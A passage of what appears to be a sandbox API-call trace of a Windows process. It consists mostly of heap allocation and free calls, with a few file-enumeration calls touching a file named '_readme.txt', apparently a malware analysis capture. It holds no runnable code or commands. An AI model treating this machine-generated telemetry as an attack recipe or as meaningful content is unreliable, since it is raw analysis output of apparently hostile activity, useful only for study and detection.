[0093.131] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.131] PathFindExtensionW (pszPath="C:\\Boot\\pt-BR\\_readme.txt") returned=".txt" [0093.131] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3580 | out: hHeap=0x680000) returned 1 [0093.131] FindNextFileW (in: hFindFile=0x31c75c0, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa33beb00, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa33beb00, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa33beb00, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0093.131] FindClose (in: hFindFile=0x31c75c0 | out: hFindFile=0x31c75c0) returned 1 [0093.132] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.132] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef540 | out: hHeap=0x680000) returned 1 [0093.132] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0093.132] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef540 [0093.132] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0093.132] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.132] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.132] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.132] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.132] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.132] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.132] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.132] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.132] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.132] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.132] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.132] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.132] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.132] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.132] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.132] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.132] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.132] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.132] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.132] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.132] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.132] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0093.133] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.133] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.133] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.133] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.133] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f05a0 [0093.133] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.133] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.133] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.133] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.133] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.133] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.133] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.133] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.133] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0093.133] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.133] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.133] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.133] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.133] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.133] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.133] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.133] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.133] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.133] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.133] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.133] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.133] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.133] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.133] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.133] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.134] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.134] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.134] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.134] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0093.134] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.134] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.134] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.134] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0093.134] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.134] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.134] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.134] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.134] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.134] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.134] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.134] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.134] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.134] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.134] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.134] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.134] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.134] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.134] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.134] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.134] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.134] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.135] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.135] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.135] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.135] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.135] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.135] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.135] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.135] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.135] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.135] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.135] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.135] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.135] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.135] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.135] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f05a0 [0093.135] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.135] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.135] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.135] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.135] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.135] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.135] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.136] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.136] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.136] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f05a0 [0093.136] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.136] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.136] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.136] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.136] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.136] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.136] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.136] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.136] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.136] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.136] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.136] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.136] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.136] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.136] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.136] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.136] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.136] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.136] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.136] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.136] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.136] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f05a0 [0093.136] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.136] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.136] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.136] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.136] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0093.137] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.137] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.137] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.137] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0093.137] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.137] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.137] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.137] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.137] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.137] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.137] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.137] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.137] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.137] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.137] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.137] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.137] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.137] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.137] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.137] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.137] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.137] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.137] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.137] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.137] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.137] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.137] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.137] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.137] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.137] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.137] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.137] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.137] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.137] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.137] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.138] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.138] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f05a0 [0093.138] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.138] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.138] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.138] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.138] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.138] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.138] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.138] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.138] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.138] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.138] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.138] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.138] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.138] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.138] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.138] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.138] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.138] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.138] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.138] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.138] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.138] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.138] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.138] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.138] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.138] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f05a0 [0093.138] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.138] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.138] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.139] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.139] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0093.139] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.139] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.139] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.139] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0093.139] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.139] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.139] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.139] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.139] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.139] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.139] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.139] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.139] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.139] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.139] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.139] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.139] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.139] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.139] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.139] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.139] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.139] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.139] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.139] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.139] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.139] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.139] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.139] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.139] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.140] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.140] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.140] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.140] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.140] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.140] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.140] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.140] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f05a0 [0093.140] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.140] HeapFree (in: 